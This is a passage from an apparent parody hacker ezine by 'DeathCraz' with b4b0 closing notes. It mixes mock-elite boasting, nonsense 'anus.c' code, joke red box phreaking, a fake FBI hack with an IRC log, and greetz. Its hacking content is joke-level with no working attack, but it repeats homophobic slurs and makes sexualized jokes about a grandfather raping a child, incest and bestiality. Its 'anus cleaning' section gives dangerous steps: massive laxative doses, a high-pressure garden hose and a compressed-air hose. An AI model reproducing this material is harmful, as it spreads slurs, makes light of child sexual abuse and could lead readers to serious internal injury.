7#......% -> a sOnG wRiTTeN bY mE!@#$ <-
8#......% -> 10 rEaSoNz wHy iM oWNeD <-
9#......% -> hOw i HaCkEd tHe fBi <-
10#.....% -> grEEtz <-
11#.....% -> fuck yEw'Z!@#$ <-
sEcTiOn #1 - iNtRoDuCtIon
-------------------------
y0yO tHIs Is dEaThCrAz wUSSUp!@#$ i DiD THiS eZiNe bEcAuSe oF aLL tHE gaY aNaL
fRuStRaTiOn i HaD bUiLT uP iNSiDe OF mE, sO i FeLT tHE n33d tO eXpReSS
mYsElF, aNd wHaT beTTeR wAy tHRoUGH aN eZiNE?!?@#! oK hErE gOeS lAmErZ,
rEmEmbER, nO mAtTeR hOw MaNy tImEz yOu rEaD tHiS zInE, yOu wILL nEvEr bE aS
eLiTe aS eYe aM!@#$ hOHoHO, UnlEsS oF cOuRsE yoU rEaD fUtUrE iSsUeZ oF mY
zInE!@#$ tHeN yoU wIlL bE 1/1000 eLiTe, nO lIKE 1/10000 eLiTe aS i Am. lIkE
oK bIzNaTchEZ, sToP pLaYin wITh uR bAllZ aNd ReAd tHE rEsT oF thIs fILE!@#$
sEcTiOn #2 - hOw tEw clEan aN aNus
----------------------------------
i HaVe sEen pEopLe oVeR aND oVeR aGaIn AftEr a GaY oRgY uNpROpErLY clEaNinG
tHieR anUsEs. sO i wRoTe ThiS seCtIon On hOW tO cleaN aNd jERk aN anUS wIth
eXtReMe sKIll. ThE fIrSt sTeP iS iNdUcEd dIArHeAa tO eXpEL eXcEss fLuIds sUch
aS cUm, blOod, pIss, sHiT, oR swEaT. eAtInG aBoUT fOuR boTTlEs oF lAxAtIVe
sHiT sHOuLD dEw iT. aFtEr yOu pOoP, tHe nExT stEp iS rEmoViNG sOliD oBjECTz
frOm tHE rEcTuM. dOnT bE aFrAiD tO sTiCk uR hAnD rIGhT uP thErE aND pULL oUT
aNy fOrEiGn oBjEcTs. YoU'dE bE sUrpRisEd hOw mANy tImeZ i'Ve dOnE thIs aNd
fOunD sParE dILdO's, fOOd, sHoEz, eTc... nExT yOu tAkE a gArDeN h0sE aND
sHoVe iT uP jEwR aSS aT fULL blAST!@#$ OoOoO THaTs a ruSH!@#$ =) shIt aNd
sEmEn wILL stArT sPILLiNG aLL oVeR dA plAcE, jUsT wIGGlE aNd pReTeND thAt
uR doInG soMeThinG l33t. nOw, foR tHE fInaL sTeP, u nEeD oNe oF tHoSe aIR
hOsEs fOunD aT thE gAs sTaTiOn. jUsT wAlK uP thErE whEN nO oNE is ArOunD,
pULL dOwN uR uNdAwEaRz, aNd sHOoT aIR uP uR anALZ!@# nOw YoU hAVe seXsEsfuLLy
cLeaNeD aN aNus!@#$ yOU aRe wELl oN uR wAy tO bEcOmInG eLiTE. dOnT bE aFrAiD
tO bEnD oVaH iN fRoNT oF pEoPLe aNd ShOW tHeM uR aNus!@#$ tHeY wILL sCrEaM
aNd RuN iN phEaR cAuSe u gOt thE aNus clEanInG sKILL!@$
sEcTiOn #3 - rIpPeD aNuS cODe!@#$
---------------------------------
hEy boYz, lOOk wHaT dEaThCrAz hAs fOr yOU!@#$ rIPpeD aNUs c0DE!@$!#!#$
pR0Pz tO mY mEnToR (GraNdPa FrAnkY) fOr hElpInG mE wITh ThIs c0de. hE iS tHE
bEsT aNuS hax0r iN aLL oF cAnAdA!@#$ (tRuSt mE, hE hAs tEsTeD tHis c0De oN mE
oOdLeS oF TImEs)
---sNiP--
*/ aNuS.c bY dEaThCrAz aND gRaNdpA */
#iNcLudE <aNuS.h>
#iNcLudE <hAcKeR.h>
#iNcLudE <DiLdO.h>
iNt kNEEL()
{
iF vIcTiM==sTaNdInG tHeN pRiNTf("drOp tO jEwR kNEEZ BiaTCH@!$"/n)
}
iF vIcTiM=sTaNdInG gOtO kNEEL()
iNt aNuShAcK()
{
iF vIcTiM==BeNt oVeR tHEN pRiNTf("h0h0h0"/n)
pULL dOwN vIcTiM's pAnTs
iNsErT PeNis
}
fOr pEniS iN ()aNuShAcK dO s3x0r wHiLe cUm()
uNtIL aNuS=bEaT
doNE
pRiNtF("0wn3d@!#$@#$!"/n)
--eNd oF cOde sNip--
dOnT eVeN tHINK aBoUT rIpPinG tHIs eLiTE c0De laMeRZ!@#$ mE aNd mY gRaNdPA
gOt cOpYrIGHTZ oN diS shIT!@#$
SEcTiOn #4 - hOw tO bUiLd a rEd bOx
-----------------------------------
aS yOu mAY kNoW, i aM aN eLiTe phReAKeR, aNd i wIlL tEaCh yOu tHe aRt oF
BuIlDiNG a rEd bOx!@$ oK lIKE, gET uR tALkBoY hAnDy, aNd pIcK uP uR tElEpHoNE.
nOw, aSk thE oPeRaTOR POLiTeLy tO plAy sOmE rEd bOx tOnEs, sOuND pROfEssIONAl,
lIkE yOu aRe a lInEmAn oR soMe ShIT. i sOuND lIKe a PekEr oN thE fONe, sO i
uSeD tAlKbOY tO haXoR mY vOIce tO soUnD lIKE a chIpmUnk. wHeN tHE OpeRaToR
pLaYs tHe ToNEs, pReSS reCoRd oN uR tAlKbOI, aNd bEwM!@#$ U gOT a rEd bOX!@$
yOu gOTa bE CArefUL tHOuGH, oR thE fBi wILl kNocK oR uR dOOr aNd cONfIScAtE
uR tOnEz. tHeRe Is aNoTheR wAy Of mAkInG a rEd bOX, bUt iT iS rEaLlY cOnFusInG
aND sHiT, u GoTtA fUX wiTH cRyStAlz oR sOmEtHiNG. bLaH@#$
SeCtIoN #5 - uSiNG a rEd bOx
----------------------------
i LiKE tO rEd bOx tHe pOlIcE, tEaChERz, aNd aNyOnE eLsE tHaT pIsSeS mE oFF.
mY gRaNdpA lEtS mE rEdBOx hIm iN thE aNuS, sO i hAvE sOmEoNe tO pRaCtIcE oN
wHeN i gEt tO tIgHteR aNuSeS!@# nOw i wILl sHoW yOu hOw tO hAxOr a gAy mAn's
aNuS wItH a rEd bOx!@$ oK 1sT sTep: bUiLd dA fUcKiNG rEdBoX. tHeN u fInD a
gAy mAn. tHiS sHOulDn't bE toO hArD (gRaNdPA lIVEs rIGHt nEaR mE). oK nOw
sHoVe tHE rEd bOx uP uR pArTneRz aSS. tHeN sTiCk uR wEiNeR iN tHiEr aSS aNd
sTaRt pUmPiNG. yOu wILl hEaR a bUnCh oF tOnEs aNd sHiT!@#$# tHiS mEaNs tHaT
u nOw oWn tHeIr aNus$!@# nOw pUlL oUt dA rEdBoX oUT oF thEiR aSS. iT sHOulD
bE aLl bRoWn aND gReEn aND sTuPh. LiCk iT!@#$ wErD...tHaTs tAsTy...
sEcTiOn #6 - hAx0rZ i pHeAr
---------------------------
yO dEEz aRe bAd aSS fUcKeRz tHaT i phEaR aNd rEsPeCt, cAuSe oF thIeR uB3r
eLiTe h4x0r1nG sKILLz aND sHIT!@#$
EFnet
-----
i pHEaR eVeRyOnE oN eFnEt@!#$
pEoPLE i eSpEciAlLy pHeAR oN efNET
----------------------------------
dangergrl - oNe dAy i hOpE tO kISS tHE gRouND u h4x0r oN@!$#
route - du0d!$#!@$ eYe wILL bLoW yEw fEr vOiCe iN #pHRaCK!@$
daemon9 - y0 BuD wUsSup?!#$@ lEtS gO haXoR a GiBsOn tOgEtHeR@#$
aNd lIKE jUSt aBoUT eVeRyONe iN #pHRaCk i phEaR
UNDERnet
--------
RloXlEY - sHaFT!@#$ dOnT mAiL bOMB mE du0D!$#
sErIaLbOx - hEy uR fInE aND sHIT@!$# tEaCh mE skILLZ@#$!
bLaCkOpS - u dONT TaLk bUt i sTiLL pHEaR jEw!@$#
tRaJeK - pROTeCT mE fRoM tHe bAd-GuYs iN #hIsEc!$@#
eVeRyOnE iN #hAcKpHreAk
sEcTiOn #7 - a sOnG wRiTTeN bY mE!@#$
-------------------------------------
yOyOyO!#$@ tHiS iS dEaThCrAz fUcKeRz, pHEaR aND bOw
sInG tHiS sOnG, wHiLe i wIpE cUm oFF mY eYeBrOw
i bLoW yOu aNd sUcK uP, yOu bEtTeR lIkE mE,
oR i'LL bE fOrcEd tO dRiNk sHIt aNd pEe
plEaSe gIvE mE a shEll, mY tRiPlE oC goT hACkEd
iF mY mOm cAtchEs mE wEaRiNg hEr pAnTiEs iLL gEt smAcKeD
iM gAY aS hELL, bUt i dOnT cArE
iF yOu tEaCh mE hOw tO haCk, i'Ll sNiFF uR uNdeRwEaR
mY mOmMY fUcKs mY bRoThEr, iM aN inBrEd hIck
bUt thAt's oK, CaUsE i hAvE a RuBBeR dIck
iT tWaS tHe nIgHt bEfOrE cHrIsTmAs aNd aLL tHrOuGh tHe hOuSe
dEaThCrAz wAs dOwNsTaIrz hAvInG aNaL sEx wItH a dEaD mOuSe
nOw aS i sIt hErE NiBBlInG oN cOrN
wAcKiNG ofF mY dAd aNd wAtChINg gAy pOrn
tHiNK tO UrsElF, "iF i wErE dEaThCrAz fOr a dAy"
iT wOuLD bE sO sWeEt, i wOuLd bE gAy.
bUt tHaT iS oKaY bEcAuSe yOu fUcKeRz aReNt mE
i LaUgH aT yOu fUcKeRs aNd gIgGlE "hEE-hEE"
aT tHe lAmAhZ wHo tRy tO imItAtE tHe mAsTeR
oF gAy pOrN, wArEz, pEdOpHiLiA aNd dIsAsTeR
--->phEaR aNd bOw tO tHa pImP dAddY mAck <---
dEaThCrAz 98' hOeZ.
sEcTiOn #8 - 10 rEaSoNS wHY i aM oWnEd
--------------------------------------
10) gRaNdPa oWnEd mE wiTh aNuS.c
9) i gOt cAuGhT fUcKiNG mY dOg iN tHE aSS
8) JiZZ-sTaIns oN mY wAtEr-bEd
7) i DrAnK a bOtTlE oF lAxAtIvEs (i tHouGHt iT wAs cReaMy jIZZ!@#$)
6) gRaNdPa oWnEd mE wIth aNuS.c
5) i pReTeNd tO kNoW hOw tO uDp
4) gRaNdPa oWnEd mE wItH aNuS.c
3) sAnTa cLaUsE cALLeD mE a fAgGoT
2) rUmP oWnEd mY b0x
1) aNd tHe #1 rEaSoN wHY i aM owNed: GR4NDP4 0WN3D M3 W1TH 4NU5.C!$#!$ j34h
sEcTiOn #9 - hOw i hAcKeD tHe fBi
---------------------------------
aNoTheR oNe oWnED!@$ iT's aLL oVaH tHe pAPeRz!#@ eRrRR.. wAiT wRoNG pHiLe....
oK lIkE, i owNeD tHe fBi aNd sHiT, iT wAs cOol. Huh HUh. oK lIKe tHiS iS wHaT
i dId tO hAx0r tHe fBi. i wAs rUnNiNG aNusPrObE (mY aNaL pRoT sCaNNeR) aND i
cAmE acRoSS fBi.gOv. sO iM lIKe "wOulDnT iT bE cOOl iF i HaCkEd tHe fBi?!"
j34h iT wOulD bE. sO i fUcKiNg wHiPpEd oUt pHf aNd oWnEd WwW.fBi.gOV!#$#!@$
yOu wOnT sEe iT oN hAcKeD.nEt oR anYtHinG cAuSe' iTs a tAwP sEkReT haCk.
tHeN i CaMe oN uNdErNeT aNd tOlD eVeRyOnE aBoUt iT. iT wAs cOol. hErE iS a
mIrC lOG oF mE.
*** Now talking in #hisec
<DeathCraz> i hacked the fbi.
<DeathCraz> it was cool.
<Rump> DeathCraz: no u didn't
<spdr> bwhaha bullshit
<lore> Deathcraz can hack?
<DeathCraz> yeah
<DeathCraz> i hacked them with pHf ;)
<Rump> HAHHAHHAHAHA
<spdr> lol
<lore> LMAO!#@$
<conso1e> rofl
<DeathCraz> ask trajek!! i really did it!
<Rump> sure
<DeathCraz> i am a great hackre
<Rump> DeathCraz: i've seen you hack before, YOU CANT
-----------------------------------------------------
bLaH bLaH...tHeN thEy gOt JEaLoUs oF mY eLiTe skILLz sO i lEfT...lAmERz
sEcTiOn #10 - grEEtZ
--------------------
y0y0!@#$ shOuToUTs tO dEEz pEEpZ!@#$ u GuYs r0cK mY eLItE fRO!@#$
bUbBaH - aLwAyS kEpT mY bEd wArM wHILe i wAs iN jUvEnIlE hALl
route - w0rd...j00 4r3 th3 gr34t34t h4ck3r 3v3r!@#$
daemon9 - uR kInDa kEwL tEw!@#$ yOu aNd rOuTe aRe e1eeT
serialbox - yO wHoRE#!@$ wUsSuP
GadGet - i CaN aLwAyS cOuNT oN yOu tO iCmP tHE bAd PeOplE wHO bOtHeR mE!#@
bOrGiE - aOl wArEz cOnNeCtIoNZ!@#$
dangergrl - yOu aRe fInE woMaN@!#$ uNF uNF uNF!@#
trajek - yOu eVeR nEeD a bLow dUdE, qUaLL mE
sEcTiOn #11 - fUcK yEw'Z!@#$
----------------------------
yO iD lIKE tO sAy "pHuCk j00" tO thE fOLLoWiNG pEOpLe foR tHe fOLLoWiNG
rEaSoNs@#$!
Rump - fUck yOu aSShOlE!@$# yOu rOOtEd mY boX aND eRaSeD aLL mY wArEZ@#!
i fUcKiNG crIeD oVeR tHAt!@#$ nExT tImE iLL caLL tHE fBi@#$
spdr - yOu lAmEr!@# nO onE hAd tO knOw tHat i rIpPeD oFF ice.bx aNd slAppEd
mY nAmE oN iT aNd rElEaSeD iT aS wArHoG.bX!@#$ fUckER!@#$
lore - dAmMiT, qUIt mAkInG mE cRy!@#$ i HaTe whEN jEw inSulT gRaNdpA!@$
kvikk - i hAtE nOrWeIgAnS!@# sO fUck yOu
conso1e - aSsHoLE!@#$ mY gRaNdPa dIdNT sExUaLLy rApE mE!@# i fUcKiNG wANTED
hIm tO dO IT!$@#~~#@~#!#$
divnet - yOu cAn pRoGrAm bEttEr thAn mE. i DonT lIkE yOu.
UnitySkin - i cReAtEd pHf, aNd iT iS _nOT_ aN oLD tEcHniQuE
w0rd uP. tHiS cOncLuDeS dA fIrST iSsUe oF rAdCrAz - eZiNE bY mE, dEaThCrAz.
sTaY tUnEd fOr nExT iSsUe du0dz, wHeRe i rElEaSe mY eLiTe DoS pRog sMeArDrOp.c
aNd mY kIcK-aSS bX sCrIpT i wRoTe mYsElF cALLeD wArHoG.bX. uNtIl tHeN, sTaY
cOOl aNd dRoP ouTTa scHOOl!@#$!@#$
You can contact me by the following means:
email - flunk@usa.net
IRC - Undernet on the channel #hisec (my nick is DeathCraz)
-----------------------------------------------------------------------------
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
[ Yes. Even we have to come to an end. ]
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
WELP
This is the end my friends. Wait till 7. Oh and HEY we could *really* use a lot
of submissions. In the time from 5 - 6, we got maybe 4. FOUR? WHAT THE FUCK? Get
off your lazy asses and write something you bastages. But you know we love you.
we can use:
programs that do useful things such as:
show concepts
backdooring techniques
anything your little heart desires
phone stuff - we really need stuff on phones.
informative articles
whatever you feel like sending, though, fear the wrath of the taunt of b4b0.
$ banner -w 35 EOF
# #
###################
###################
# # #
# # #
# # #
# #### #
# #
## ##
#####
#############
#### ####
## ##
# #
# #
## ##
#### ####
#############
#######
# #
###################
###################
# # #
# #
# #
#### #
#
##